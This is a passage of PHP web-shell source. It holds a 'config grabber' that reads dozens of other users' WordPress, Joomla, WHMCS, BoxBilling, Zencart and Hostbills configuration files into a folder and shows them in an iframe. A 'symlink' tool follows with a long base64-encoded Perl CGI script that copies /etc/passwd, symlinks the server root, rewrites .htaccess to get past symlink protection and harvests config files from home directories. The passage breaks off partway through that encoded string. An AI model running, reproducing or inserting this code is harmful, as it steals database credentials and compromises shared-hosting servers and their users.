  782. "$user_docroot/blogs/wp-config.php" => "Wordpress",
  783. "$user_docroot/configuration.php" => "Joomla",
  784. "$user_docroot/blog/configuration.php" => "Joomla",
  785. "$user_docroot/submitticket.php" => "^WHMCS",
  786. "$user_docroot/cms/configuration.php" => "Joomla",
  787. "$user_docroot/beta/configuration.php" => "Joomla",
  788. "$user_docroot/portal/configuration.php" => "Joomla",
  789. "$user_docroot/site/configuration.php" => "Joomla",
  790. "$user_docroot/main/configuration.php" => "Joomla",
  791. "$user_docroot/home/configuration.php" => "Joomla",
  792. "$user_docroot/demo/configuration.php" => "Joomla",
  793. "$user_docroot/test/configuration.php" => "Joomla",
  794. "$user_docroot/v1/configuration.php" => "Joomla",
  795. "$user_docroot/v2/configuration.php" => "Joomla",
  796. "$user_docroot/joomla/configuration.php" => "Joomla",
  797. "$user_docroot/new/configuration.php" => "Joomla",
  798. "$user_docroot/WHMCS/submitticket.php" => "WHMCS",
  799. "$user_docroot/whmcs1/submitticket.php" => "WHMCS",
  800. "$user_docroot/Whmcs/submitticket.php" => "WHMCS",
  801. "$user_docroot/whmcs/submitticket.php" => "WHMCS",
  802. "$user_docroot/whmcs/submitticket.php" => "WHMCS",
  803. "$user_docroot/WHMC/submitticket.php" => "WHMCS",
  804. "$user_docroot/Whmc/submitticket.php" => "WHMCS",
  805. "$user_docroot/whmc/submitticket.php" => "WHMCS",
  806. "$user_docroot/WHM/submitticket.php" => "WHMCS",
  807. "$user_docroot/Whm/submitticket.php" => "WHMCS",
  808. "$user_docroot/whm/submitticket.php" => "WHMCS",
  809. "$user_docroot/HOST/submitticket.php" => "WHMCS",
  810. "$user_docroot/Host/submitticket.php" => "WHMCS",
  811. "$user_docroot/host/submitticket.php" => "WHMCS",
  812. "$user_docroot/SUPPORTES/submitticket.php" => "WHMCS",
  813. "$user_docroot/Supportes/submitticket.php" => "WHMCS",
  814. "$user_docroot/supportes/submitticket.php" => "WHMCS",
  815. "$user_docroot/domains/submitticket.php" => "WHMCS",
  816. "$user_docroot/domain/submitticket.php" => "WHMCS",
  817. "$user_docroot/Hosting/submitticket.php" => "WHMCS",
  818. "$user_docroot/HOSTING/submitticket.php" => "WHMCS",
  819. "$user_docroot/hosting/submitticket.php" => "WHMCS",
  820. "$user_docroot/CART/submitticket.php" => "WHMCS",
  821. "$user_docroot/Cart/submitticket.php" => "WHMCS",
  822. "$user_docroot/cart/submitticket.php" => "WHMCS",
  823. "$user_docroot/ORDER/submitticket.php" => "WHMCS",
  824. "$user_docroot/Order/submitticket.php" => "WHMCS",
  825. "$user_docroot/order/submitticket.php" => "WHMCS",
  826. "$user_docroot/CLIENT/submitticket.php" => "WHMCS",
  827. "$user_docroot/Client/submitticket.php" => "WHMCS",
  828. "$user_docroot/client/submitticket.php" => "WHMCS",
  829. "$user_docroot/CLIENTAREA/submitticket.php" => "WHMCS",
  830. "$user_docroot/Clientarea/submitticket.php" => "WHMCS",
  831. "$user_docroot/clientarea/submitticket.php" => "WHMCS",
  832. "$user_docroot/SUPPORT/submitticket.php" => "WHMCS",
  833. "$user_docroot/Support/submitticket.php" => "WHMCS",
  834. "$user_docroot/support/submitticket.php" => "WHMCS",
  835. "$user_docroot/BILLING/submitticket.php" => "WHMCS",
  836. "$user_docroot/Billing/submitticket.php" => "WHMCS",
  837. "$user_docroot/billing/submitticket.php" => "WHMCS",
  838. "$user_docroot/BUY/submitticket.php" => "WHMCS",
  839. "$user_docroot/Buy/submitticket.php" => "WHMCS",
  840. "$user_docroot/buy/submitticket.php" => "WHMCS",
  841. "$user_docroot/MANAGE/submitticket.php" => "WHMCS",
  842. "$user_docroot/Manage/submitticket.php" => "WHMCS",
  843. "$user_docroot/manage/submitticket.php" => "WHMCS",
  844. "$user_docroot/CLIENTSUPPORT/submitticket.php" => "WHMCS",
  845. "$user_docroot/ClientSupport/submitticket.php" => "WHMCS",
  846. "$user_docroot/Clientsupport/submitticket.php" => "WHMCS",
  847. "$user_docroot/clientsupport/submitticket.php" => "WHMCS",
  848. "$user_docroot/CHECKOUT/submitticket.php" => "WHMCS",
  849. "$user_docroot/Checkout/submitticket.php" => "WHMCS",
  850. "$user_docroot/checkout/submitticket.php" => "WHMCS",
  851. "$user_docroot/BILLINGS/submitticket.php" => "WHMCS",
  852. "$user_docroot/Billings/submitticket.php" => "WHMCS",
  853. "$user_docroot/billings/submitticket.php" => "WHMCS",
  854. "$user_docroot/BASKET/submitticket.php" => "WHMCS",
  855. "$user_docroot/Basket/submitticket.php" => "WHMCS",
  856. "$user_docroot/basket/submitticket.php" => "WHMCS",
  857. "$user_docroot/SECURE/submitticket.php" => "WHMCS",
  858. "$user_docroot/Secure/submitticket.php" => "WHMCS",
  859. "$user_docroot/secure/submitticket.php" => "WHMCS",
  860. "$user_docroot/SALES/submitticket.php" => "WHMCS",
  861. "$user_docroot/Sales/submitticket.php" => "WHMCS",
  862. "$user_docroot/sales/submitticket.php" => "WHMCS",
  863. "$user_docroot/BILL/submitticket.php" => "WHMCS",
  864. "$user_docroot/Bill/submitticket.php" => "WHMCS",
  865. "$user_docroot/bill/submitticket.php" => "WHMCS",
  866. "$user_docroot/PURCHASE/submitticket.php" => "WHMCS",
  867. "$user_docroot/Purchase/submitticket.php" => "WHMCS",
  868. "$user_docroot/purchase/submitticket.php" => "WHMCS",
  869. "$user_docroot/ACCOUNT/submitticket.php" => "WHMCS",
  870. "$user_docroot/Account/submitticket.php" => "WHMCS",
  871. "$user_docroot/account/submitticket.php" => "WHMCS",
  872. "$user_docroot/USER/submitticket.php" => "WHMCS",
  873. "$user_docroot/User/submitticket.php" => "WHMCS",
  874. "$user_docroot/user/submitticket.php" => "WHMCS",
  875. "$user_docroot/CLIENTS/submitticket.php" => "WHMCS",
  876. "$user_docroot/Clients/submitticket.php" => "WHMCS",
  877. "$user_docroot/clients/submitticket.php" => "WHMCS",
  878. "$user_docroot/BILLINGS/submitticket.php" => "WHMCS",
  879. "$user_docroot/Billings/submitticket.php" => "WHMCS",
  880. "$user_docroot/billings/submitticket.php" => "WHMCS",
  881. "$user_docroot/MY/submitticket.php" => "WHMCS",
  882. "$user_docroot/My/submitticket.php" => "WHMCS",
  883. "$user_docroot/my/submitticket.php" => "WHMCS",
  884. "$user_docroot/secure/whm/submitticket.php" => "WHMCS",
  885. "$user_docroot/secure/whmcs/submitticket.php" => "WHMCS",
  886. "$user_docroot/panel/submitticket.php" => "WHMCS",
  887. "$user_docroot/clientes/submitticket.php" => "WHMCS",
  888. "$user_docroot/cliente/submitticket.php" => "WHMCS",
  889. "$user_docroot/support/order/submitticket.php" => "WHMCS",
  890. "$user_docroot/bb-config.php" => "BoxBilling",
  891. "$user_docroot/boxbilling/bb-config.php" => "BoxBilling",
  892. "$user_docroot/box/bb-config.php" => "BoxBilling",
  893. "$user_docroot/host/bb-config.php" => "BoxBilling",
  894. "$user_docroot/Host/bb-config.php" => "BoxBilling",
  895. "$user_docroot/supportes/bb-config.php" => "BoxBilling",
  896. "$user_docroot/support/bb-config.php" => "BoxBilling",
  897. "$user_docroot/hosting/bb-config.php" => "BoxBilling",
  898. "$user_docroot/cart/bb-config.php" => "BoxBilling",
  899. "$user_docroot/order/bb-config.php" => "BoxBilling",
  900. "$user_docroot/client/bb-config.php" => "BoxBilling",
  901. "$user_docroot/clients/bb-config.php" => "BoxBilling",
  902. "$user_docroot/cliente/bb-config.php" => "BoxBilling",
  903. "$user_docroot/clientes/bb-config.php" => "BoxBilling",
  904. "$user_docroot/billing/bb-config.php" => "BoxBilling",
  905. "$user_docroot/billings/bb-config.php" => "BoxBilling",
  906. "$user_docroot/my/bb-config.php" => "BoxBilling",
  907. "$user_docroot/secure/bb-config.php" => "BoxBilling",
  908. "$user_docroot/support/order/bb-config.php" => "BoxBilling",
  909. "$user_docroot/includes/dist-configure.php" => "Zencart",
  910. "$user_docroot/zencart/includes/dist-configure.php" => "Zencart",
  911. "$user_docroot/products/includes/dist-configure.php" => "Zencart",
  912. "$user_docroot/cart/includes/dist-configure.php" => "Zencart",
  913. "$user_docroot/shop/includes/dist-configure.php" => "Zencart",
  914. "$user_docroot/includes/iso4217.php" => "Hostbills",
  915. "$user_docroot/hostbills/includes/iso4217.php" => "Hostbills",
  916. "$user_docroot/host/includes/iso4217.php" => "Hostbills",
  917. "$user_docroot/Host/includes/iso4217.php" => "Hostbills",
  918. "$user_docroot/supportes/includes/iso4217.php" => "Hostbills",
  919. "$user_docroot/support/includes/iso4217.php" => "Hostbills",
  920. "$user_docroot/hosting/includes/iso4217.php" => "Hostbills",
  921. "$user_docroot/cart/includes/iso4217.php" => "Hostbills",
  922. "$user_docroot/order/includes/iso4217.php" => "Hostbills",
  923. "$user_docroot/client/includes/iso4217.php" => "Hostbills",
  924. "$user_docroot/clients/includes/iso4217.php" => "Hostbills",
  925. "$user_docroot/cliente/includes/iso4217.php" => "Hostbills",
  926. "$user_docroot/clientes/includes/iso4217.php" => "Hostbills",
  927. "$user_docroot/billing/includes/iso4217.php" => "Hostbills",
  928. "$user_docroot/billings/includes/iso4217.php" => "Hostbills",
  929. "$user_docroot/my/includes/iso4217.php" => "Hostbills",
  930. "$user_docroot/secure/includes/iso4217.php" => "Hostbills",
  931. "$user_docroot/support/order/includes/iso4217.php" => "Hostbills"
  932.  
  933. );
  934. foreach($getconfig as $config => $userconfig) {
  935. $get = file_get_contents($config);
  936. if($get == '') {
  937. }
  938. else {
  939. $fopen = fopen("idx_config/$user-$userconfig.txt", "w");
  940. fputs($fopen, $get);
  941. }
  942. }
  943. }
  944. }
  945. }
  946. print "<div style='background: #ffffff; width: 100%; height: 100%'>";
  947. print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/idx_config/' frameborder='0' scrolling='yes'><iframe>";
  948. print "</div>";
  949. }
  950. elseif($toolsname === "symlink") {
  951. if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't create directory 'idx_sym'."));
  952. if(!is_dir(path()."/idx_sym/")) {
  953. $sym['code'] = "IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQojICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyAjIA0KIw0KIwkJTmFtZSA6IFBlcmwvQ0dJIENvbmZpZyBTeW1saW5rZXIgKFdpdGggQXV0byBCeXBhc3MgU3ltbGluayA0MDQpDQojCQlWZXJzaW9uIDogMS4yDQojCQlDcmVhdGVkIDogOSBNZWkgMjAxNw0KIwkJQXV0aG9yIDogMHgxOTk5DQojCQlUaGFua3MgVG8gOiAweElEaW90ICwgSW5kb25lc2lhbiBDb2RlIFBhcnR5ICwgSmF0aW00dQ0KIwkJTW9yZSBJbmZvIDogaHR0cDovLzB4RGFyay5ibG9nc3BvdC5jb20NCiMJCVdhbnQgdG8gcmVjb2RlID8gRG9uJ3QgZm9yZ2V0IG15IG5pY2sgbmFtZSAgOikNCiMJCWh0dHA6Ly9mYWNlYm9vay5jb20vbWVsZXguMWQNCiMJCQ0KIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyANCg0KdXNlIEZpbGU6OkNvcHk7DQp1c2Ugc3RyaWN0Ow0KdXNlIHdhcm5pbmdzOw0KdXNlIE1JTUU6OkJhc2U2NDsNCmNvcHkoIi9ldGMvcGFzc3dkIiwicGFzc3dkLnR4dCIpIDsNCm1rZGlyICJpZHhfc3ltIjsNCnN5bWxpbmsoIi8iLCJpZHhfc3ltL3Jvb3QiKTsNCm15ICRmaWxlbmFtZSA9ICdwYXNzd2QudHh0JzsNCm15ICRodGFjY2VzcyA9IGRlY29kZV9iYXNlNjQoIlQzQjBhVzl1Y3lCSmJtUmxlR1Z6SUVadmJHeHZkMU41YlV4cGJtdHpEUXBFYVhKbFkzUnZjbmxKYm1SbGVDQnBibVJ2ZUhCc2IybDBMbWgwYlEwS1FXUmtWSGx3WlNCMFpYaDBMM0JzWVdsdUlDNXdhSEFnRFFwQlpHUklZVzVrYkdWeUlIUmxlSFF2Y0d4aGFXNGdMbkJvY0EwS1UyRjBhWE5tZVNCQmJua05Da2x1WkdWNFQzQjBhVzl1Y3lBclEyaGhjbk5sZEQxVlZFWXRPQ0FyUm1GdVkzbEpibVJsZUdsdVp5QXJTV2R1YjNKbFEyRnpaU0FyUm05c1pHVnljMFpwY25OMElDdFlTRlJOVENBclNGUk5URlJoWW14bElDdFRkWEJ3Y21WemMxSjFiR1Z6SUN0VGRYQndjbVZ6YzBSbGMyTnlhWEIwYVc5dUlDdE9ZVzFsVjJsa2RHZzlLaUFOQ2tGa1pFbGpiMjRnSjJSaGRHRTZhVzFoWjJVdmNHNW5PMkpoYzJVMk5DeHBWa0pQVW5jd1MwZG5iMEZCUVVGT1UxVm9SVlZuUVVGQlFrRkJRVUZCVVVOQldVRkJRVUZtT0M4NWFFRkJRVUZDU0U1RFUxWlJTVU5CWjBsbVFXaHJhVUZCUVVGQmJIZFRSbXg2UVVGQlRqRjNRVUZFWkdOQ1VXbHBZbVZCUVVGQlFtd3dVbFpvTUZVeU9XMWtTR1JvWTIxVlFXUXpaRE5NYld4MVlUTk9hbGxZUW14TWJUbDVXalYyZFZCQ2IwRkJRVVpWVTFWU1FsWkVhVTV3V2tzNVUyZE9Ra1pKV0ZCMldFNXVaR3BqVW05d1dEUlZOR3RYVm5JMVFVTm9WVGRJT0VKVFprbDBRVWhyUWpsRFdITnlWekJIZDBWUmRGSjNWa3ROVW5SQlZUaGFZMWxYWVU1dFRUSlBlSEY1ZVdsWldtUmpSMGxoV2pSYU56ZE5aV1ZSWTNjMlJFWkJMMVZFVlVGQldVaElhamhvVDBGVWFqbHZVbE5sTWxveFpqSkxhbEF4Wm1kTWEyNU5VRk0xYkZjd1ZtazBjRnB2Y0haSVdFUlhLMGxvVDNJNU9XZFlWSHByY2pseGRsUkNUWFJ5VG1RNFFYTk1WbU52YlZwTFJGQTJNV3RGVEdsb1IwbEtPVkZDWjA4eWFtUnpTVVV2U21JMVQyRmpSMFpCZDBSUlJXVk5SVTlhYm1neFJYRk5RMmgwVTBJNFlUWTBRbGN5VFU1b04xRldhV2hEUjB0alRraHpkMjFhTUd4QmExbEllRVkwVVdoQ1VFTkxTVmxTVlRsc05qQTFTMjFIUTBWSlZWbDZkRU5aVFVKbWEwVnFSMW8wVDJsSWQxSlJSaXQyYTFGSEszQjBRVU5KUmxKRlNsWlFVVUYyUm1ZclFuSnFiM2xSSzBOYVpuRnhNVEU0UkZKR1JXaHFaV0ppWW1Wc05tUkhhWGxVY1dZcmRsTnlhMkZTVVM4d2RYUk1OMjFJV0d3NWRuRXJaVkF6Vlc1aWFDOUlOV2RFUzJsUFJqWTNXV1ZpV1RCa1UwcGpVa0p0TUhveWNrWnNNbmxYY0RoQlZrUkpWek15WkdFM2NFeEJRVUZCUVVWc1JsUnJVM1ZSYlVOREp5QmVYa1JKVWtWRFZFOVNXVjVlRFFwRVpXWmhkV3gwU1dOdmJpQW5aR0YwWVRwcGJXRm5aUzl3Ym1jN1ltRnpaVFkwTEdsV1FrOVNkekJMUjJkdlFVRkJRVTVUVldoRlZXZEJRVUZDUVVGQlFVRlJRMEZaUVVGQlFXWTRMemxvUVVGQlFVRllUbE5TTUVsQmNuTTBZelpSUVVGQlFWcHBVekJrUlVGUU9FRXZkMFF2YjB3eWJtdDNRVUZCUVd4M1UwWnNla0ZCUVV4RmQwRkJRM2hOUWtGS2NXTkhRVUZCUVVGa01GTlZNVVpDT1c5S1FtaGpWRXAyTWtJeVpEUkJRVUZLVFZOVlVrSldSR3BNWWxwUE9WUm9lRnBGU1ZjdmNXeDJaSFJOTXpoQ1RtZEtVVzFSWjBwSFpDdEJMMDFSUWt4M1IycHBkMGd6Ym5ka2ExTk1kRTh5ZUVWU1J6Vk1jWGhZVWxOSlVqSlpSR1pFTkVkclIwMHdVRE55WWpSaU9WQkJlakJzTjNCVGJGZHNWekJtYm01TWIyeEJTVkJDTkZCWWFEUmxSblZ1ZFdOQlNVbE1kMlJGVTJWYWVVRnBabTV3Tml0MU9XOU9URzh6WjAwelRucFVaRWhTS3k4dmVuWktUWHBUZVVwTFMyOWthVWxuT0VGWVlYaGxTWG94WWtSYU4wMTRjVTVtZEdkVFZWSkVWM2szVEZWdVdqQmtXVzE0UVVaQlZrVnNTVFpCUlVONVowbHpVVkZ6YVhwTVFrOUJRa0ZFVDJwTFFYQnhhRGQxTjBkdlExVlhhWGRaWW1WMGIxVkljbkpRWTNkRGNXOUdNa3RWWlZoTWVrVjZRbll3SzNWUmJWTklUVVZhT1VZMlUxcGpjalpwTkVselFrOWhMMkkzU0ZGTllVaDBTVUYzWjB4a1NHRnNSRUV4WlhZd1pWRmlVMnB5UlhKUmQwcHdjVVkwWlVGNEwyaHZjVVF4TXpKdFRXdEtjbWsxZFZOUGJFWm9SV2h3VlZGSmFXOXFkMkZ0VDBST2MyeHFabFZYUTNGd1RHNVBZV0ZEVTB0S2RHNWhRa056V2xscVFXeHNiVmhKTkhaaFpXOWhWbGd3WTJKVFpHaHRWVkl6ZWtGTGRrNXFXVFpXYVc5dk1IUlhlbWRGYjI1TFlsY3JTMnRIVjNRelZXNTBNRU5sUjJaS2N6bG5LMVZWTUhKRlIwaElMMGgzTDAxcVNEWXZWQ3RRVDJSR2IxSk9TME5vVFRJeWVHMVBVR1Z6Y0dwUVIxRTJTSEJPVVRJM2REWnpRVU5FVTA1aGJubHZiR3BFVEVWa1ZtRkdUMHhsT0ZwclZXcExOWFZyY1ROME56bHNVRU0zTDA5RWF6VkhZU3RaTms4MVRYRjViVTUzTTFZeGVUTm9lWHBtV0RCb2NYWktUSGxpV0Vaa0t5dG1NbVF6WkRCa2JYTXJjWFpuTkU5RWVqaG1TSGd3TDB4elltVXpPVFkwYzFNM0t6UjFSV3AxYm5CeGJWTmxObVV6UkROT05TOU9NRmRhWW5Sc2VUbG1NRGx1V2pKYUwySXlPWFl5Wmt4RlpYWjJTemx4ZGpkak1uUnZTMms0VldscFVXbHhTR0p0Tm5KcFZ6WmhNVE5tYml0NmRqY3pLMjl4YjNKb1kweG5TMVZHV0ZaUUsyWnVOVElyVEc5dWFqaEpURW93VURoYVNVTkRSamt2VUZSd1EyeG9jRUoyWjFCbGJHOU1PVlUxTlU1SlFVRkJRVUZCVTFWV1QxSkxOVU5aU1VrOUp3MEtTVzVrWlhoSloyNXZjbVVnS2k1MGVIUTBNRFFOQ2tsdVpHVjRVM1I1YkdWVGFHVmxkQ0FuYUhSMGNEb3ZMMlYyWlc1MExtbHVaRzk0Y0d4dmFYUXViM0l1YVdRdmMzbHRiR2x1YXk1amMzTW5EUXBTWlhkeWFYUmxSVzVuYVc1bElFOXVEUXBTWlhkeWFYUmxRMjl1WkNBbGUxSkZVVlZGVTFSZlJrbE1SVTVCVFVWOUlGNHVLakI0YzNsdE5EQTBJRnRPUTEwTkNsSmxkM0pwZEdWU2RXeGxJRnd1ZEhoMEpDQWxlMUpGVVZWRlUxUmZWVkpKZlRRd05DQmJUQ3hTUFRNd01pNU9RMTA9Iik7DQpteSAkc3ltID0gZGVjb2RlX2Jhc2U2NCgiVDNCMGFXOXVjeUJKYm1SbGVHVnpJRVp2Ykd4dmQxTjViVXhwYm10ekRRcEVhWEpsWTNSdmNubEpibVJsZUNCcGJtUnZlSEJzYjJsMExtaDBiUTBLU0dWaFpHVnlUbUZ0WlNBd2VERTVPVGt1ZEhoMERRcFRZWFJwYzJaNUlFRnVlUTBLU1c1a1pYaFBjSFJwYjI1eklFbG5ibTl5WlVOaGMyVWdSbUZ1WTNsSmJtUmxlR2x1WnlCR2IyeGtaWEp6Um1seWMzUWdUbUZ0WlZkcFpIUm9QU29nUkdWelkzSnBjSFJwYjI1WGFXUjBhRDBxSUZOMWNIQnlaWE56U0ZSTlRGQnlaV0Z0WW14bERRcEpibVJsZUVsbmJtOXlaU0FxRFFwSmJtUmxlRk4wZVd4bFUyaGxaWFFnSjJoMGRIQTZMeTlsZG1WdWRDNXBibVJ2ZUhCc2IybDBMbTl5TG1sa0wzTjViV3hwYm1zdVkzTnpKdz09Iik7DQpvcGVuKG15ICRmaDEsICc+JywgJ2lkeF9zeW0vLmh0YWNjZXNzJyk7DQpwcmludCAkZmgxICIkaHRhY2Nlc3MiOw0KY2xvc2UgJGZoMTsNCm9wZW4obXkgJHh4LCAnPicsICdpZHhfc3ltL25lbXUudHh0Jyk7DQpwcmludCAkeHggIiRzeW0iOw0KY2xvc2UgJHh4Ow0Kb3BlbihteSAkZmgsICc8OmVuY29kaW5nKFVURi04KScsICRmaWxlbmFtZSk7DQp3aGlsZSAobXkgJHJvdyA9IDwkZmg+KSB7DQpteSBAbWF0Y2hlcyA9ICRyb3cgPX4gLyguKj8pOng6L2c7DQpteSAkdXNlcm55YSA9ICQxOw0KbXkgQGFycmF5ID0gKA0KCXtjb25maWdkaXIgPT4gJy9ob21lLycuJHVzZXJueWEuJy8uYWNjZXNzaGFzaCcsIHR5cGUgPT4gJ1dITS1hY2Nlc3NoYXNoJyB9LA0KCXtjb25maWdkaXIgPT4gJy9ob21lLycuJHVzZXJueWEuJy9wdWJsaWNfaHRtbC9jb25maWcva29uZWtzaS5waHAnLCB0eXBlID0+ICdMb2tvbWVkaWEnIH0sDQoJe2NvbmZpZ2RpciA9PiAnL2hvbWUvJy4kdXNlcm55YS4nL3B1YmxpY19odG1sL2NvbmZpZy9zZXR0aW5ncy5pbmMucGhwJywgdHlwZSA9PiAnUHJlc3RhU2hvcCcgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvYXBwL2V0Yy9sb2NhbC54bWwnLCB0eXBlID0+ICdNYWdlbnRvJyB9LA0KCXtjb25maWdkaXIgPT4gJy9ob21lLycuJHVzZXJueWEuJy9wdWJsaWNfaHRtbC9hZG1pbi9jb25maWcucGhwJywgdHlwZSA9PiAnT3BlbkNhcnQnIH0sDQoJe2NvbmZpZ2RpciA9PiAnL2hvbWUvJy4kdXNlcm55YS4nL3B1YmxpY19odG1sL2FwcGxpY2F0aW9uL2NvbmZpZy9kYXRhYmFzZS5waHAnLCB0eXBlID0+ICdFbGxpc2xhYicgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvd3AtY29uZmlnLnBocCcsIHR5cGUgPT4gJ1dvcmRwcmVzcycgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvd3AvdGVzdC93cC1jb25maWcucGhwJywgdHlwZSA9PiAnV29yZHByZXNzJyB9LA0KCXtjb25maWdkaXIgPT4gJy9ob21lLycuJHVzZXJueWEuJy9wdWJsaWNfaHRtbC9ibG9nL3dwLWNvbmZpZy5waHAnLCB0eXBlID0+ICdXb3JkcHJlc3MnIH0sDQoJe2NvbmZpZ2RpciA9PiAnL2hvbWUvJy4kdXNlcm55YS4nL3B1YmxpY19odG1sL2JldGEvd3AtY29uZmlnLnBocCcsIHR5cGUgPT4gJ1dvcmRwcmVzcycgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvcG9ydGFsL3dwLWNvbmZpZy5waHAnLCB0eXBlID0+ICdXb3JkcHJlc3MnIH0sDQoJe2NvbmZpZ2RpciA9PiAnL2hvbWUvJy4kdXNlcm55YS4nL3B1YmxpY19odG1sL3NpdGUvd3AtY29uZmlnLnBocCcsIHR5cGUgPT4gJ1dvcmRwcmVzcycgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvd3Avd3AtY29uZmlnLnBocCcsIHR5cGUgPT4gJ1dvcmRwcmVzcycgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvV1Avd3AtY29uZmlnLnBocCcsIHR5cGUgPT4gJ1dvcmRwcmVzcycgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvbmV3cy93cC1jb25maWcucGhwJywgdHlwZSA9PiAnV29yZHByZXNzJyB9LA0KCXtjb25maWdkaXIgPT4gJy9ob21lLycuJHVzZXJueWEuJy9wdWJsaWNfaHRtbC93b3JkcHJlc3Mvd3AtY29uZmlnLnBocCcsIHR5cGUgPT4gJ1dvcmRwcmVzcycgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvdGVzdC93cC1jb25maWcucGhwJywgdHlwZSA9PiAnV29yZHByZXNzJyB9LA0KCXtjb25maWdkaXIgPT4gJy9ob21lLycuJHVzZXJueWEuJy9wdWJsaWNfaHRtbC9kZW1vL3dwLWNvbmZpZy5waHAnLCB0eXBlID0+ICdXb3JkcHJlc3MnIH0sDQoJe2NvbmZpZ2RpciA9PiAnL2hvbWUvJy4kdXNlcm55YS4nL3B1YmxpY19odG1sL2hvbWUvd3AtY29uZmlnLnBocCcsIHR5cGUgPT4gJ1dvcmRwcmVzcycgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvdjEvd3AtY29uZmlnLnBocCcsIHR5cGUgPT4gJ1dvcmRwcmVzcycgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvdjIvd3AtY29uZmlnLnBocCcsIHR5cGUgPT4gJ1dvcmRwcmVzcycgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvcHJlc3Mvd3AtY29uZmlnLnBocCcsIHR5cGUgPT4gJ1dvcmRwcmVzcycgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvbmV3L3dwLWNvbmZpZy5waHAnLCB0eXBlID0+ICdXb3JkcHJlc3MnIH0sDQoJe2NvbmZpZ2RpciA9PiAnL2hvbWUvJy4kdXNlcm55YS4nL3B1YmxpY19odG1sL2Jsb2dzL3dwLWNvbmZpZy5waHAnLCB0eXBlID0+ICdXb3JkcHJlc3MnIH0sDQoJe2NvbmZpZ2RpciA9PiAnL2hvbWUvJy4kdXNlcm55YS4nL3B1YmxpY19odG1sL2NvbmZpZ3VyYXRpb24ucGhwJywgdHlwZSA9PiAnSm9vbWxhJyB9LA0KCXtjb25maWdkaXIgPT4gJy9ob21lLycuJHVzZXJueWEuJy9wdWJsaWNfaHRtbC9ibG9nL2NvbmZpZ3VyYXRpb24ucGhwJywgdHlwZSA9PiAnSm9vbWxhJyB9LA0KCXtjb25maWdkaXIgPT4gJy9ob21lLycuJHVzZXJueWEuJy9wdWJsaWNfaHRtbC9zdWJtaXR0aWNrZXQucGhwJywgdHlwZSA9PiAnXldITUNTJyB9LA0KCXtjb25maWdkaXIgPT4gJy9ob21lLycuJHVzZXJueWEuJy9wdWJsaWNfaHRtbC9jbXMvY29uZmlndXJhdGlvbi5waHAnLCB0eXBlID0+ICdKb29tbGEnIH0sDQoJe2NvbmZpZ2RpciA9PiAnL2hvbWUvJy4kdXNlcm55YS4nL3B1YmxpY19odG1sL2JldGEvY29uZmlndXJhdGlvbi5waHAnLCB0eXBlID0+ICdKb29tbGEnIH0sDQoJe2NvbmZpZ2RpciA9PiAnL2hvbWUvJy4kdXNlcm55YS4nL3B1YmxpY19odG1sL3BvcnRhbC9jb25maWd1cmF0aW9uLnBocCcsIHR5cGUgPT4gJ0pvb21sYScgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvc2l0ZS9jb25maWd1cmF0aW9uLnBocCcsIHR5cGUgPT4gJ0pvb21sYScgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvbWFpbi9jb25maWd1cmF0aW9uLnBocCcsIHR5cGUgPT4gJ0pvb21sYScgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvaG9tZS9jb25maWd1cmF0aW9uLnBocCcsIHR5cGUgPT4gJ0pvb21sYScgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvZGVtby9jb25maWd1cmF0aW9uLnBocCcsIHR5cGUgPT4gJ0pvb21sYScgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvdGVzdC9jb25maWd1cmF0aW9uLnBocCcsIHR5cGUgPT4gJ0pvb21sYScgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvdjEvY29uZmlndXJhdGlvbi5waHAnLCB0eXBlID0+ICdKb29tbGEnIH0sDQoJe2NvbmZpZ2RpciA9PiAnL2hvbWUvJy4kdXNlcm55YS4nL3B1YmxpY19odG1sL3YyL2NvbmZpZ3VyYXRpb24ucGhwJywgdHlwZSA9PiAnSm9vbWxhJyB9LA0KCXtjb25maWdkaXIgPT4gJy9ob21lLycuJHVzZXJueWEuJy9wdWJsaWNfaHRtbC9qb29tbGEvY2